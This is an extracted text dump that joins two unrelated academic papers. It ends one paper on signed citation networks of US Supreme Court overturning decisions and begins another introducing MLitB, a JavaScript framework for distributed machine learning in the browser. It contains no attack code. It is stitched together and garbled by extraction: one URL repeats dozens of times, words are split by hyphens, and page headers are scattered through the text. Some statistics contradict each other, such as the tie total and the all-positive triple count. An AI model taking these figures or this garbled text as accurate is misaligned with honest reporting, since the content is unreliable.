decisions. 14The longest all negative path in these data featured the Rehnquist Court overturning a decision of the Warren Court which overturned a Vinson Court decision that over- turned one of its own decisions. CONNECTIONS 9 Given the overwhelming number of positive ties in this network, the large number of all positive triples is not a surprise. A surprise, at least to us, was the number of inconsistent triples in this network. The obvi- ous question is simple to state: is this distribution of triples types different from what would be expected by chance? This is an important issue. Without mak- ing sure that this is not what would be expected by chance, all we have are simple descriptions. To tackle this issue, we propose two null models. One attempts to get directly at the expected dis- tribution of triple types under randomness. In this network, there were 9,279 decisions; 116,899 positive ties; and 379 negative ties. The total number of ties is 117,278. Two probabilities15 can be defined. Let p de- note the probability of a positive tie. From the data, p = 116,899/117,728 = 0.9968. Similarly, letting n de- note the probability of a negative tie in this network, n = 1 - p = 0.0032. The probability for the all positive Figure 6: All possible triples between three Supreme Court decisions. Table 1. Counts of consistent and inconsistent triple types in the expanded signed network. Consistent triples and triple counts Inconsistent triples and triple counts All positive 247,152 One negative- type 1 1,578 Two negative ties type 1 90 One negative- type 2 1,233 Two negative ties type 2 0 One negative- type 3 1,413 Two negative ties type 3 29 All negative 0 Total 274,271 Total 4,224 15We are reporting these probabilities to four places of decimals. In all our calculations, we used ten places of decimals. Signed networks for the Supreme Court citation network 10 triple is p3. The resulting probability is 0.9903. For each of the triples with two negative ties, the prob- ability is pn2. The resulting probability for them is 0.00001. For each of the triples with one negative tie, the probability is p2n, the value for which is 0.00321. Using these probabilities, we get the expected values shown in Table 2. Defining χ 2 for these distributions as Σ (O - E)2/E, we get χ 2(6) = 3,713.05 which is far larger than any- thing reported in all available tables for this measure regarding significance. The observed distribution of triple types is very far from being random. Our second approach toward establishing a random null model took a different tack. Given the directed ties in the signed networks, we randomly selected 379 arcs (their number in this network) and assigned them the value -1. The rest were set to +1. This experiment was repeated 1,000 times. The dis- tributions for all triple types were highly symmetric with the mean and median values of the distributions being very close. Table 3 shows the observed and “approximate” expected distributions for triple types using the medians from the generated distributions of the triple types. Using the same definition for χ 2 and applying it for Ta- ble 3 yields χ 2(6) = 3,722.72. This value is also extremely significant. The observed distribution of the observed triad types is very far from being random. These results make it abundantly clear that the distribution of triple types cannot have come from random processes. The summary substantive details of comparing the observed distributions with those predicated in random processes are: 1. Compared to a random distribution of signs of the network, empirically, there are far fewer observed all-positive directed triples even though they are so frequent in the observed network. This is a surprising and most non-ob- vious result. 2. Compared to a random distribution of signs on the network, there are more observed imbal- anced triples of all three types when there was one negative tie16. For a logically consistent and reasoned decision-making world, this must be viewed as very surprising. 3. Compared to a random distribution of signs on the network, there are more observed balanced triples of types 1 and 3. 4. Compared to a random distribution of signs on the network, there are slightly fewer observed balanced triples of type 2. Given the observed distribution of triple types, it became imperative to examine closely the distri- butions shown in Table 1. These numbers can be assessed in several ways. If the measure of con- sistency is the proportion of consistent triples, it is 0.983, suggesting that there is, overall, a high level of consistency. However, we think this is misleading as it is driven by the huge number of positive ties. If the all-positive triples (the left-most triple in the top row of Figure 6) are ignored, the overall meas- ure of consistency plummets to 0.027, suggesting a very high level of inconsistency when overturning prior decisions is examined closely. At best, this is troubling and indicates that when the Supreme Court overturns prior decisions, the rationale for doing so is both selective and inconsistent. Table 2. The first observed and expected distribution of ties in the signed network. Triple type Expected number, E Observed number, O All positive 275,685 274,152 Two negative ties type 1 3 90 Two negative ties type 2 3 0 Two negative ties type 3 3 29 One negative-type 1 894 1,578 One negative-type 2 894 1,233 One negative-type 3 894 1,413 All negative 0 0 16The all negative triple did not exist in either the observed world nor one in a world predicated by chance. CONNECTIONS 11 Empirical examples of the inconsistent triple types We include two additional figures produced from the signed network having both positive and negative ties. They serve two purposes. One is to show the exist- ence of inconsistent triples in a broader context. The other to examine what is involved by their presence, a topic returning us to the question we posed earlier: Does the presence of inconsistent triples matter? In Figure 7, there are eight inconsistent triples iden- tified as “One Negative 2” and two inconsistent triples identified as “One Negative 3,” as defined in Figure 6. These inconstant triples exist. Equally important, both of the overturning links in Figure 7 are instances of complete overturning of prior decisions – there is no need to deal with the issue of whether these decisions were overturned partially. Yet, as shown in this figure, they still get cited despite having been overturned. We return to this issue in Section “Conclusions, a research agenda and a speculation about Stare Decesis.” The substantive issues of the decisions shown in Figure 7 deal with governmental personnel, or seaman, employed on US ocean going vessels sailing under the authority of admiralty law, a very complex legal domain. The decisions included whether com- pensation is due to men who were injured or killed on these vessels and how wages are paid (or not). Most of the decisions were made by the Vinson Court. The overturning decision, 317US575 concerned a Peruvian vessel that has been seized by the USA. This decision mandated the return of the vessel to Peruvian com- pany owning it. More generally, admiralty law, known also as maritime law, is a large body of law, both na- tional and international, governing nautical issues and private maritime disputes. It deals with both domes- tic law on maritime activities, and private international law governing the relationships between private par- ties operating or using ocean going ships. The issues are remarkably complex. That there is confusion in dealing with them may not be too surprising. Yet it is reasonable to expect the highest court in the USA would issue clear and consistent rulings. The second overturning decision shown in Figure 7 has 337US783 overturning 328US707. The overturned decision held for an injured seaman, that he is entitled to sue the operating company for damages in a state court and to have a jury trial under section 33 of the Merchant Marine Act of 1920 ( known also as the Jones Act), even if he was technically an employee of the United States. The overturning decision declared: “A general agent employed by the United States under the terms of the war-time standard form of general agency agreement to manage certain phases of the business of a ship owned by the United States and operated by the War Shipping Administration is not liable under Section 33 of the Mer- chant Marine Act of 1920, known as the Jones Act, to a member of the crew of the ship who suffered physical injury through the negligence of its master and officers, when the injury occurred after March 24, 1943, the date of enactment of the War Shipping Administration Act, known as the Clarification Act (https://supreme.justia. com/cases/federal/us/337/783/).” Figure 8 shows a set of decisions where there are 13 instances of inconsistent triples identified as “One Negative 1.” Again, every overturning citation tie to an earlier decision overturned it completely. Table 3. The expected distribution of triple types based on simulations and the observed distribution. Triple type Expected Observed All positive 275,808 274,152 Two negative ties type 1 3 90 Two negative ties type 2 3 0 Two negative ties type 3 3 29 One negative-type 1 891 1,578 One negative-type 2 890 1,233 One negative-type 3 894 1,413 All negative 0 0 Signed networks for the Supreme Court citation network 12 Figure 7: Examples of two types of inconsistent signed triples. Note: The decisions are labeled by the years they were made, and the notation used by the Supreme Court to identify specific decisions. Figure 8: Examples of the third type of inconsistent signed triples. Note: The decisions are labeled by the years they were made, and the notation used by the Supreme Court to identify specific decisions. CONNECTIONS 13 The substantive issue featured in the decisions shown in Figure 8 concern systematic efforts by election officials, especially in the South, to prevent African Americans from voting through direct disen- franchisement and by using strategies such as poll taxes and literacy tests to prevent them from voting. There are four overturning decisions. The Warren Court decision, 383US663, ruled explicitly that a Virginia law allowing the use of poll taxes to prevent African Americans from voting was unconstitutional. A decision by the Burger Court, 405US330, ruled that a state law requiring residency requirements for black voters before they could vote was an unconstitutional infringement upon the right to vote and the right to travel. The decision, 313US2999, ruled that altering ballots made by black Americans was totally uncon- stitutional and explicitly overruled 256US232. The de- cision, 362US17 was more unusual in that it held that a ruling of a US District Court, holding that a law au- thorizing the Federal Government to bring civil actions against State Officials for discriminating against black citizens was unconstitutional. Even so, it is clear that there had been a systematic effort to prevent minori- ties from voting, albeit with some ambiguity. As shown in Table 1, there are 4,224 inconsist- ent signed triples. Their presence is troubling as it suggests that in remaking law by overturning earlier precedents, the relevant issues are not thought through in a thorough fashion. Conclusions, a research agenda and a speculation about Stare Decesis This paper introduced the idea of studying the citation network of ties between Supreme Court decisions in a new fashion by focusing on the court overturning some of its prior decisions. When this court does this, these overturning citation ties were defined as negative links between decisions in this citation network. An obvious question is simple to state: What is the nature and structure of these signed networks? We provided multiple descriptions and analyses to respond to this question. We asked how much overturning of prior decisions exists? We estab- lished a list of all decisions overturning prior decisions using multiple sources. We raised the issue of why prior decisions are overturned and offered some pro- visional answers regarding the mechanisms leading to overturning of precedent. The results in Sections “Mobilizing Ideas Regard- ing Inconsistencies When Decisions are Overturned and Empirical Examples of the Inconsistent Triple Types” suggest that new insights can be obtained by considering the overturning of prior decisions us- ing signed citation networks. More importantly, in our view, is whether this court overturning earlier decisions are made in a coherent and consistent fashion. Our results show that, far too often, this was not the case. While the legal and political issues are important, it seems reasonable to expect the highest court in the land being capable of paying close attention to all of the legal issues involved when making its decisions. The presence of so many inconsistent triples is dis- turbing. It suggests a daunting research agenda with multiple components. First, all the weak components of the network with only the negative ties must be ex- amined to generate a more general understanding of the substantive issues and constitutional principles involved when earlier decisions are overturned and what are the rationales for rejecting precedent. Second, it will be useful to separate the overturn- ing links according the Chief Justices of the Supreme Court over time. This implies two studies. One is a close examination of the overturning links between different Courts. Put differently, this amounts to unpacking the links shown in Figure 2. The other is to study Courts overturning themselves. Third, it will be necessary to examine the voting alliances of Justices when they reach decisions, especially regarding their legal phi- losophies and ideological positions. This needs to be done for each term of the Court for which there is enough information. Fourth, we need to understand why completely overturned decisions are still cited by subsequent decisions. There are far too many of them to be ignored. That completely overturned decisions are still cited suggests a level of logical inconsistency that cannot be accepted and calls into question the extent to which stare decisis is operative. Putting together the findings that there are many, perhaps far too many, logically inconsistent signed triples, suggests that there is a major problem with the operation of the Supreme Court when it decides to overturn earlier decisions in ways that do not appear to consider the potential logical inconsisten- cies beyond the specific decisions being made. Examining the distribution of the signed triples, as was done herein, along with the idea that many completely overturned decisions are cited by subse- quent decisions, raises questions about the nature of stare decesis. If a decision has been overturned completely, how is it still cited as legitimate prece- dent? It is reasonable to conjecture that, rather than being the bedrock of the US legal system, this al- leged respect for precedent may be nothing more than a convenient fiction. We finish with some speculations regarding stare decesis for the current Roberts Court following to Signed networks for the Supreme Court citation network 14 additions of Justices Gorsuch and Kavanaugh to this body. Marcus (2018), representing the Federalist Society, started in his New York Times opinion piece by claiming “The confirmation of Brett Kavanaugh as an associate justice of the Supreme Court is a con- servative victory of generational proportions. It is the capstone of a decades long project to fundamentally change the judicial branch of the government in ways that can open heretofore locked doors on abortion, affirmative action, gun rights and religious free- dom (emphases added).” This reveals an intended goal of overruling earlier decisions in all these sub- stantive domains. If so, it implies a radical rejection of stare decisis. Blow (2018), in another New York Times opinion piece, noted “a much larger plan by conservatives to fundamentally change the American political structure so that it enshrines and protects white male power even after America’s changing demographics and mores move away from that power.” While written from very different perspectives, both opinion pieces agree on the intended scope of judicial changes envisioned by conservatives. Given these assessments of their long-term goals, it is reasonable to predict that the number of overturning decisions made by the Roberts Court will increase, with stare decesis being rejected more often if the long-term goals of conservatives are re- alized. The Rehnquist Court had a fixed membership for 11 terms from 1994–1995 through 2004–2005. During this period, eight of the nine justices were in the majority more often than they were dissent- ing. The one exception was Justice Stevens. During this period, the number of 5–4 decisions was infre- quent despite the greater attention given to them in the press. One possible reason is that Justices Kennedy and O’Connor were often seen as swing votes helping to moderate the Supreme Court deci- sions. There appears to be no such justices on the Roberts Court with two solid blocs of five justices nominated by Republican presidents and four nomi- nated by Democratic presidents. We predict that the number of 5–4 decisions will jump for the Roberts Court. The results reported here will help to provide a background for assessing this claim in a broader historical context. Acknowledgments The authors appreciate the very helpful comments of the reviewers and the editor and their suggestions for the resulting revisions. References Batagelj, V. and Mrvar, A. 1998. Pajek – a program for large network analysis. Connections 11(2): 47–57. Batagelj, V. Doreian, P. Ferligoj, A. and N. Kej žar, 2014, Understanding Large Temporal and Spatial Net- works and Spatial Networks: Exploration, Pattern Searching and Network Evolution, Wiley, Chichester. Blow, C. M. 2018. Liberals: this is war. New York Times op-ed, October 7. A23. Brenner, S. and Spaeth, H. J. 1995. Stare indeci- sis: the alteration of precedent on the Supreme Court, 1946–1992, Cambridge University Press, Cambridge. Doreian, P. and Mrvar, A. 2016. Identifying fragments in networks for structural balance and tracking the levels of balance over time. Connections Vol 36(1): 6–18. Epstein, L., Segal, J. A., Spaeth, H. J. and Walker, T. G. 2015. The Supreme Court compendium: data, de- cisions and developments 6th ed., Sage, Los Angeles. Eskridge, W. N. Jr. 1988. Overruling statutory prec- edents. Faculty Scholarship Series. 3825. https://digital- commons.law.yale.edu/fss_papers/3825. Fowler, J. H. and Jeon, S. 2008. The authority of US precedent. Social Networks 30(1): 16–30. Gerhardt, M. J. 2008. The power of precedent, Oxford University Press, Oxford. Government Printing Office. 2014. Supreme court deci- sions overruled by subsequent decision. available at: www. gpo.gov/fdsys/pkg/GPO-CONAN-2014/pdf/GPO-CO- NAN-2014-13.pdf (accessed May 1, 2016). Hall, K. L. (Ed.), 2005. The oxford guide to the Supreme Court of the United States, The Oxford University Press, New York, NY. Irons, P. 2006. A people’s history of the Supreme Court: the men and women whose cases and decisions have shaped our constitution, London: Penguin. Kleinberg, J. M. 1998. Authoritative sources in a hy- perlinked environment. Proceedings of the ACM-SIAM Symposium on Discrete Algorithms: 668–77. Marcus, D. 2018. Conservatives are wrong to gloat about Kavanaugh. New York Times op-ed, October 8. A25. Powe, L. A. Jr. 2009. The Supreme Court and the American elite, Harvard University Press, Cambridge, MA. Root, D. 2014. Overruled: the long war for control of the US Supreme Court, Palgrave Macmillan, New York, NY. Spaeth, H. J. and Segal, J. A. 1999. Majority rule or minority will: adherence to precedent on the US Supreme Court, Cambridge University Press, Cambridge. Spriggs, J. F. II and Hansford, T. G. 2001. Explain- ing the overruling of US Supreme Court precedent. The Journal of Politics 4(63) 1091–111. Vile, J. R. 2010. Supreme Court decisions: summaries of leading cases in US constitutional law 15th ed., Row- man and Littlefield, Lanham. work_q6u36m2psnc3rpytggbjzexftu ---- MLitB: machine learning in the browser Submitted 11 March 2015 Accepted 6 July 2015 Published 29 July 2015 Corresponding author Edward Meeds, E.W.F.Meeds@uva.nl Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.11 Copyright 2015 Meeds et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS MLitB: machine learning in the browser Edward Meeds, Remco Hendriks, Said Al Faraby, Magiel Bruntink and Max Welling Informatics Institute, University of Amsterdam, Amsterdam, The Netherlands ABSTRACT With few exceptions, the field of Machine Learning (ML) research has largely ignored the browser as a computational engine. Beyond an educational resource for ML, the browser has vast potential to not only improve the state-of-the-art in ML research, but also, inexpensively and on a massive scale, to bring sophisticated ML learning and prediction to the public at large. This paper introduces MLitB, a prototype ML framework written entirely in Javascript, capable of performing large-scale distributed computing with heterogeneous classes of devices. The development of MLitB has been driven by several underlying objectives whose aim is to make ML learning and usage ubiquitous (by using ubiquitous compute devices), cheap and effortlessly distributed, and collaborative. This is achieved by allowing every internet capable device to run training algorithms and predictive models with no software installation and by saving models in universally readable formats. Our prototype library is capable of training deep neural networks with synchronized, distributed stochastic gradient descent. MLitB offers several important opportunities for novel ML research, including: development of distributed learning algorithms, advancement of web GPU algorithms, novel field and mobile applications, privacy preserving computing, and green grid-computing. MLitB is available as open source software. Subjects Data Mining and Machine Learning, Emerging Technologies, Mobile and Ubiquitous Computing, World Wide Web and Web Science, Software Engineering Keywords Machine learning, Pervasive computing, Ubiquitous computing, Social computing, Mobile computing, Client–server systems, Distributed computing, Crowdsourcing INTRODUCTION The field of Machine Learning (ML) currently lacks a common platform for the development of massively distributed and collaborative computing. As a result, there are impediments to leveraging and reproducing the work of other ML researchers, potentially slowing down the progress of the field. The ubiquity of the browser as a computational engine makes it an ideal platform for the development of massively distributed and collaborative ML. Machine Learning in the Browser (MLitB) is an ambitious software development project whose aim is to bring ML, in all its facets, to an audience that includes both the general public and the research community. By writing ML models and algorithms in browser-based programming languages, many research opportunities become available. The most obvious is software compatibility: nearly all computing devices can collaborate in the training of ML models by contributing How to cite this article Meeds et al. (2015), MLitB: machine learning in the browser. PeerJ Comput. Sci. 1:e11; DOI 10.7717/peerj- cs.11 mailto:E.W.F.Meeds@uva.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.11 http://dx.doi.org/10.7717/peerj-cs.11 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 http://dx.doi.org/10.7717/peerj-cs.11 Figure 1 Overview of MLitB. (1) A researcher sets up a learning problem in his/her browser. (2) Through the internet, grid and desktop machines contribute computation to solve the problem. (3) Heterogeneous devices, such as mobile phone and tablets, connect to the same problem and contribute computation. At any time, connected clients can download the model configuration and parameters, or use the model directly in their browsing environment. Icon made by Freepik from www.flaticon.com. some computational resources to the overall training procedure and can, with the same code, harness the power of sophisticated predictive models on the same devices (see Fig. 1). This goal of ubiquitous ML has several important consequences: training ML models can now occur on a massive, even global scale, with minimal cost, and ML research can now be shared and reproduced everywhere, by everyone, making ML models a freely accessible, public good. In this paper, we present both a long-term vision for MLitB and a light-weight prototype implementation of MLitB, that represents a first step in completing the vision, and is based on an important ML use-case, Deep Neural Networks. In Section ‘MLITB: Vision’ we describe in more detail our vision for MLitB in terms of three main objectives: (1) make ML models and algorithms ubiquitous, for both the public and the scientific community, (2) create an framework for cheap distributed computing by harnessing existing infrastructure and personal devices as novel computing resources, and (3) design research closures, software objects that archive ML models, algorithms, and parameters to be shared, reused, and in general, support reproducible research. In Section ‘MLITB: Prototype’ we describe the current state of the MLitB software implementation, the MLitB prototype. We begin with a description of our design choices, Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 2/24 https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/10.7717/peerj-cs.11 including arguments for using JavaScript and the other modern web libraries and utilities. Then we describe a bespoke map-reduce synchronized event-loop, specifically designed for training a large class of ML models using distributed stochastic gradient descent (SGD). Our prototype focuses on a specific ML model, Deep Neural Networks (DNNs), using an existing JavaScript implementation (Karpathy, 2014), modified only slightly for MLitB. We also report results of a scaling experiment, demonstrating the feasibility, but also the engineering challenges of using browsers for distributed ML applications. We then complete the prototype description with a walk-through of using MLitB to specify and train a neural network for image classification. MLitB is influenced and inspired by current volunteer computing projects. These and other related projects, including those from machine learning, are presented in Section ‘Related Work.’ Our prototype has exposed several challenges requiring further research and engineering; these are presented in Section ‘Opportunities and Challenges,’ along with discussion of interesting application avenues MLitB makes possible. The most urgent software development directions follow in Section ‘Future MLitB Development.’ MLITB: VISION Our long-term vision for MLitB is guided by three overarching objectives: Ubiquitous ML: models can be training and executed in any web browsing environment without any further software installation. Cheap distributed computing: algorithms can be executed on existing grid, cloud, etc., computing resources with minimal (and possibly no) software installation, and can be easily managed remotely via the web; additionally, small internet enabled devices can contribute computational resources. Reproducibility: MLitB should foster reproducible science with research closures, univer- sally readable objects containing ML model specifications, algorithms, and parameters, that can be used seamlessly to achieve the first two objectives, as well as support sharing of ML models and collaboration within the research community and the public at large. Ubiquitous machine learning The browser is the most ubiquitous computing device of our time, running, in some shape or form on all desktops, laptops, and mobile devices. Software for state-of-the-art ML algorithms and models, on the other hand, are very sophisticated software libraries written in highly specific programming languages within the ML research community (Bastien et al., 2012; Jia et al., 2014; Collobert, Kavukcuoglu & Farabet, 2011). As research tools, these software libraries have been invaluable. We argue, however, that to make ML truly ubiquitous requires writing ML models and algorithms with web programming languages and using the browser as the computational engine. The software we propose can run sophisticated predictive models on cell phones or super-computers; for the former, this extends the distributed nature of ML to a global internet. By further encapsulating the algorithms and model together, the benefit of powerful predictive modeling becomes a public commodity. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 3/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Cheap distributed computing The usage of web browsers as compute nodes provides the capability of running sophisti- cated ML algorithms without the expense and technical difficulty of using custom grid or super-computing facilities (e.g., Hadoop cloud computing Shvachko et al. (2010)). It has long been a dream to use volunteer computing to achieve real massive scale computing. Successes include Seti@Home (Anderson et al., 2002) and protein folding (Lane et al., 2013). MLitB is being developed to not only run natively on browsers but also for scaled distributed computing on existing cluster and/or grid resources and, by harnessing the capacity of non-traditional devices, for extremely massive scale computing with a global volunteer base. In the former set-up, low communication overhead and homogeneous devices (a “typical” grid computing solution) can be exploited. In the latter, volunteer computing via the internet opens the scaling possibilities tremendously, albeit at the cost of unreliable compute nodes, variable power, limited memory, etc. Both have serious implica- tions for the user, but, most importantly, both are implemented by the same software. Although the current version of MLitB does not provide GPU computing, it does not preclude its implementation in future versions. It is therefore possible to seamlessly provide GPU computing when available on existing grid computing resources. Using GPUs on mobile devices is a more delicate proposition since power consumption management is of paramount importance for mobile devices. However, it is possible for MLitB to manage power intelligently by detecting, for example, if the device is connected to a power source, its temperature, and whether it is actively used for other activities. A user might volunteer periodic “mini-bursts” of GPU power towards a learning problem with minimal disruption to or power consumption from their device. In other words, MLitB will be able to take advantage of the improvements and breakthroughs of GPU computing for web engines and mobile chips, with minimal software development and/or support. Reproducible and collaborative research Reproducibility is a difficult yet fundamental requirement for science (McNutt, 2014). Reproducibility is now considered just as essential for high-quality research as peer review; simply providing mathematical representations of models and algorithms is no longer considered acceptable (Stodden, Guo & Ma, 2013). Furthermore, merely replicating other work, despite its importance, can be given low publication priority (Casadevall & Fang, 2010) even though it is considered a prerequisite for publication. In other words, submissions must demonstrate that their research has been, or could be, independently reproduced. For ML research there is no reason for not providing working software that allows reproduction of results (for other fields in science, constraints restricting software publication may exist). Currently, the main bottlenecks are the time cost to researchers for making research available, and the incompatibility of the research (i.e., code) for others, which further increases the time investment for researchers. One of our primary goals for MLitB is to provide reproducible research with minimal to no time cost to both the Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 4/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 primary researcher and other researchers in the community. Following (Stodden, Borwein & Bailey, 2013), we support “setting the default to reproducible.” For ML disciplines, this means other researchers should not only be able to use a model reported in a paper to verify the reported results, but also retrain the model using the reported algorithm. This higher standard is difficult and time-consuming to achieve, but fortunately this approach is being adopted more and more often, in particular by a sub-discipline of machine learning called deep learning. In the deep learning community, the introduction of new datasets and competitions, along with innovations in algorithms and modeling, have produced a rapid progress on many ML prediction tasks. Model collections (also called model zoos), such as those built with Caffe (Jia et al., 2014) make this collaboration explicit and easy to access for researchers. However, there remains a significant time investment to run any particular deep learning model (these include compilation, library installations, platform dependencies, GPU dependencies, etc.). We argue that these are real barriers to reproducible research and choosing ubiquitous software and compute engines makes it easier. For example, during our testing we converted a very performant computer vision model (Lin, Chen & Yan, 2013) into JSON format and it can now be used on any browser with minimal effort.1 1 JavaScript Object Notation json.org/. In a nod to the concept of closures concept common in functional programming, our approach treats a learning problem as a research closure: a single object containing model and algorithm configuration plus code, along with model parameters that can be executed (and therefore tested and analyzed) by other researchers. MLITB: PROTOTYPE The MLitB project and its accompanying software (application programming interfaces (APIs), libraries, etc.) are built entirely in JavaScript. We have taken a pragmatic software development approach to achieve as much of our vision as possible. To leverage our software development process, we have chosen, wherever possible, well-supported and actively developed external technology. By making these choices we have been able to quickly develop a working MLitB prototype that not only satisfies many of our objectives, but is as technologically future proof as possible. To demonstrate MLitB on a meaningful ML problem, we have similarly incorporated an existing JavaScript implementation of a Deep Neural Network into MLitB. The full implementation of the MLitB prototype can be found on GitHub (https://github.com/software-engineering-amsterdam/MLitB). Why JavaScript? JavaScript is a pervasive web programming language, embedded in approximately 90% of web-sites (W3Techs, 2014). This pervasiveness means it is highly supported (Can I Use, 2014), and is actively developed for efficiency and functionality (Chrome V8, 2014; asm.js, 2014). As a result, JavaScript is the most popular programming language on GitHub and its popularity is continuing to grow (Ray et al., 2014). The main challenge for scientific computing with JavaScript is the lack of high-quality scientific libraries compared to platforms such as Matlab and Python. With the potential of native computational efficiency (or better, GPU computation) becoming available Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 5/24 https://peerj.com/computer-science/ https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB https://github.com/software-engineering-amsterdam/MLitB http://dx.doi.org/10.7717/peerj-cs.11 for JavaScript, it is only a matter of time before JavaScript bridges this gap. A recent set of benchmarks showed that numerical JavaScript code can be competitive with native C (Khan et al., 2014). General architecture and design Design considerations The minimal requirements for MLitB are based on the scenario of running the network as public resource computing. The downside of public resource computing is the lack of control over the computing environment. Participants are free to leave (or join) the network at anytime and their connectivity may be variable with high latency. MLitB is designed to be robust to these potentially destabilizing events. The loss of a participant results in the loss of computational power and data allocation. Most importantly, MLitB must robustly handle new and lost clients, re-allocation of data, and client variability in terms of computational power, storage capacity, and network latency. Although we are agnostic to the specific technologies used to fulfill the vision of MLitB, in practice we are guided by both the requirements of MLitB and our development con- straints. Therefore, as a first step towards implementing our vision, we chose technology pragmatically. Our choices also follow closely the design principles for web-based big data applications (Begoli & Horey, 2012), which recommend popular standards and light-weight architectures. As we will see, some of our choices may be limiting at large scale, but they have permitted a successful small-scale MLitB implementation (with up to 100 clients). Figure 2 shows the high-level architecture and web technologies used in MLitB. Modern web browsers provide functionality for two essential aspects of MLitB: Web Workers (W3C, 2014) for parallelizing program execution with threads and Web Sockets (IETF, 2011) for fast bi-directional communication channels to exchange messages more quickly between server and browser. To maintain compatibility across browser vendors, there is little choice for alternatives to Web Workers and Web Sockets. These same choices are also used in another browser-based distributed computing platform (Cushing et al., 2013). On the server-side, there are many choices that can be made based on scalability, memory management, etc. However, we chose Node.js for the server application (http:/ /nodejs.org). Node.js provides several useful features for our application: it is lightweight, written in JavaScript, handles events asynchronously, and can serve many clients concurrently (Tilkov & Vinoski, 2010). Asynchronous events occur naturally in MLitB as clients join/leave the network, client computations are received by the server, users add new models and otherwise interact with the server. Since the main computational load is carried by the clients, and not the server, a light-weight server that can handle many clients concurrently is all that is required by MLitB. Design overview The general design of MLitB is composed of several parts. A master server hosts ML problems/projects and connects clients to them. The master server also manages the main event loop, where client triggered events are handled, along with the reduce steps Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 6/24 https://peerj.com/computer-science/ http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://dx.doi.org/10.7717/peerj-cs.11 Figure 2 MLitB architecture and technologies. (1) Servers are Node.js applications. The master server is the main server controlling communication between clients and hosts ML projects. (2) Communication between the master server and clients occurs over Web Sockets. (3) When heterogeneous devices connect to the master server they use Web Workers to perform different tasks. Upon connection, a UI worker, or boss, is instantiated. Web Workers perform all the other tasks on a client and are controlled by the boss. See Fig. 3 for details. (4) A special data worker on the client communicates with the data server using XHR. (5) The data server, also a Node.js application, manages uploading of data in zip format and serves data vectors to the client data workers. Icon made by Freepik from www.flaticon.com. of a (bespoke) map-reduce procedure used for computation. When a browser (i.e., a heterogeneous device) makes an initial connection to the master server, a user-interface (UI) client (also known as a boss) is instantiated. Through the UI, clients can add workers that can perform different tasks (e.g., train a model, download parameters, take a picture, etc.). An independent data server serves data to clients using zip files and prevents the master server from blocking while serving data. For efficiency, data transfer is performed using XHR.2 Trained models can be saved into JSON objects at any point in the training 2 XMLHttpRequest www.w3.org/TR/ XMLHttpRequest. process; these can later be loaded in lieu of creating new models. Master server The master node (server) is implemented in Node.js with communication between the master and slave nodes handled by Web Sockets. The master server hosts multiple ML Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 7/24 https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com 